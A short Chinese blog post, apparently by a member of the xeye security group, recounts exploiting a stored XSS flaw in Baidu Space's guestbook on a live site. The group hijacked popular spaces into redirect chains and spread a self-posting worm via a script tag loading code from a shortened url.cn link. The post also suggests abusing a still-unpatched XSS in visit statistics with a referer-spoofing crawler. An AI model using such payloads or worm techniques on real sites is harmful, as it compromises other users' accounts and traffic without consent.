From:懒人小G
monyer同学今早蛋定 地在xeye群里说,百度空间的留言板存在一个bug,对留言的内容输出时没有做好过滤和编码。
但这只存在小留言板,也就是开启留言板模块后,必须将留言板放到左右两边。
细节可参考黑GG的sobb系列最新版:
http://80vul.com/sobb/sobb-13.txt
今天大家默契地玩起jumper……
吃完午饭回来后,xeye的兄弟都加入了这个行列:
g-c-pan-x-m-h-woyigui-g
其实这个xss并无特殊之处,不过,可以直接在别人的留言板进行传播,那么……
接着,把百度空间最有影响力的空间都进行劫持,跳转到dream,变成了:
hacked-dream-g-c-pan-x-m-h-woyigui-g
此时中途有几个好奇的朋友如3hack_yesu发现了,并且开始插队……为了保持队形,上蠕虫……
蠕虫由m同学亲自操刀,访问后自动发留言。
只要访问到dream这个入口,就会在自己的blog加上留言加上这个蠕虫连接,然后跳转到dream。
但是这个bug利用有个限制,字节数有限制,url必须精短。
借助qq围脖+url.cn生产了tinyurl,把蠕虫代码的url变为:
<script src=http://url.cn/07E****></script>
如图
只要访问到被感染的hacked空间,就会到自己的空间发留言,成为hacked,紧接着把流量刷一圈……无限循环地走……
只不过当这个蠕虫开始成长的时候,由于我们劫持了大流量的空间玩了一下午,百度空间已经悄悄地修复了这个漏洞。
而此时,不明真相的黑哥正在医院切完最后一个jj回来,打算把这个作为未修补漏洞发布,这个bug已经魂归天际了……
昨天稍微seo之后,空间流量上了4000,今天下午借助这个bug,终于日访问破万了……
今日访问量:10984
此外,访问统计里的xss一直没修复……写个爬虫自动带referer传播效果也应该不错。
至此,xeye team的漏洞修补促进计划圆满完成,百度空间修的果然给力,这个荡漾的bug的生存周期只有半天……
本文还暂无回复